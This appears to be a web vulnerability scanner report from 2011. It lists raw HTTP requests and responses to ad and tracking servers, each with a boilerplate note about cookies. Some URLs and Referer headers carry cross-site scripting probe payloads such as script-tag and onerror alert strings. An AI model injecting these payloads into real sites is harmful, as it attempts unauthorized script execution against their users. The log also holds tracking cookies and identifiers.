GET /a/js?plid=23659 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-92324644_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1765474321 HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.wsod.com Proxy-Connection: Keep-Alive Cookie: u=4d1e80eb13df2; i_1=33:971:560:0:0:34240:1296573769:B2|33:971:560:0:0:34147:1296491944:B2|33:1359:827:0:0:34115:1296343593:B2
Response
HTTP/1.1 302 Found Server: nginx/0.6.39 Date: Fri, 04 Feb 2011 02:29:41 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d1e80eb13df2; expires=Mon, 07-Mar-2011 02:29:41 GMT; path=/ Set-Cookie: i_1=33:971:560:0:0:38777:1296786581:L|33:971:560:0:0:34240:1296573769:B2|33:971:560:0:0:34147:1296491944:B2; expires=Sun, 06-Mar-2011 02:29:41 GMT; path=/ Location: http://admedia.wsod.com/media/p.gif P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
Response
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beacons?callback=jsonp1296766389465 HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cookie?pageUrl=http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22&isTop=true&callback=1 HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+13%3A39%3A06"
Response
HTTP/1.1 404 Not Found Cache-Control: must-revalidate,no-cache,no-store Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+17%3A50%3A36";Path=/;Domain=.adap.tv;Expires=Mon, 13-Oct-42 03:37:16 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 1376 Server: Jetty(6.1.22)
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adserver/5JK3H6H2EC5.gif HTTP/1.1 Host: ads.cpxadroit.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://ad.yieldmanager.com/pixel?id=840761&t=2">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /openx/www/delivery/ajs.php?zoneid=15&test=false&cb=17332097841&charset=UTF-8&loc=http%3A//www.veoh.com/browse/videos/category/action_adventure2e455%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Ecd67645eb41/watch/v18978294NGnK88j8/x22&referer=http%3A//burp/show/11 HTTP/1.1 Host: ads.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.0.10.1296766388; __utmc=91933981; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /42/112156/287 HTTP/1.1 Host: affiliates.digitalriver.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Visit37.php?vt=V&id=94375989827&ref=http://ir.supermedia.com/&z=77201&purl=http://www.supermedia.com/support/contact-us/ HTTP/1.1 Host: app.insightgrit.com Proxy-Connection: keep-alive Referer: http://www.supermedia.com/support/contact-us/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=f52e78d070ddf6bd56f62f3cfbcdfbf2; IG94375=f52e78d070ddf6bd56f62f3cfbcdfbf2
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:09 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:09 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: IG94375=f52e78d070ddf6bd56f62f3cfbcdfbf2; expires=Mon, 04-Apr-2011 19:09:09 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 49 Connection: close Content-Type: image/gif
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1 Host: app.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/adStreamJSController.xml?a=getadscheduleforcontent&format=vast&fetchads=overlay&ss_partnerId=626&ss_height=360&ss_width=480&asVersion=3&jsa=Y&blacklist=&ss_mediaCategories=&ss_mediaDescription=&ss_mediaId=v18978294NGnK88j8&ss_mediaKeywords=&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: app.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; behavioralSegments=29_110203|32_110203|263_110203
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/WebObjects/MyAppleId.woa?localang=en_US HTTP/1.1 Host: appleid.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bmx3/broker.pli?pid=p59844736&PRAd=60056&AR_C=656 HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Thu, 03 Feb 2011 22:03:49 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: ar_p59844736=exp=1&initExp=Thu Feb 3 22:03:49 2011&recExp=Thu Feb 3 22:03:49 2011&prad=60056&arc=656&; expires=Wed 04-May-2011 22:03:49 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296770629; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 9
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /u/getuid/ HTTP/1.1 Host: audience.visiblemeasures.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056; sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:50 GMT P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV" Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 22:03:50 GMT Set-Cookie: sid=C5F474F2682AA8DAE8075A6889492B4928B445B7;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 22:33:50 GMT Content-Type: text/plain Content-Length: 89 Server: Jetty(7.x.y-SNAPSHOT) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /u/getuid/?nocache=0%2E6689167399890721&a=715b8c3a075d11dea9710019b9f1584b HTTP/1.1 Host: audience.visiblemeasures.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:08:03 GMT P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV" Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 21:08:03 GMT Set-Cookie: sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 21:38:03 GMT Content-Type: text/plain Content-Length: 89 Server: Jetty(7.x.y-SNAPSHOT)
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=8&c2=6036036&rn=439947884&c7=http%3A%2F%2Fcore.videoegg.com%2Feap%2F12368%2Fhtml%2Fjstags.html%3FCCID%3D0%26r%3D0.3821160274092108&c3=1&c9=http%3A%2F%2Fwww.tucows.com%2Fvideoegg%2Fad.html&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com/eap/12368/html/jstags.html?CCID=0&r=0.3821160274092108 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Thu, 03 Feb 2011 20:51:19 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 20:51:19 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035784&c3=0&c4=2331.7717.9237.23663&c5=4871&c6=f978e9b0-271c-47b8-9a97-caba692f0bb2&c10=11073.35211.76599&c15=&cj=1&rn=5575236558291927040 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Thu, 03 Feb 2011 21:59:56 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 21:59:56 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blog.supermedia.com Proxy-Connection: keep-alive Referer: http://www.supermedia.com/social-responsibility/corporate-governance Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/2011-changes/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:18 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Changes to Look for in 2011 | SuperMedia Blog | SuperMedia.com</title>
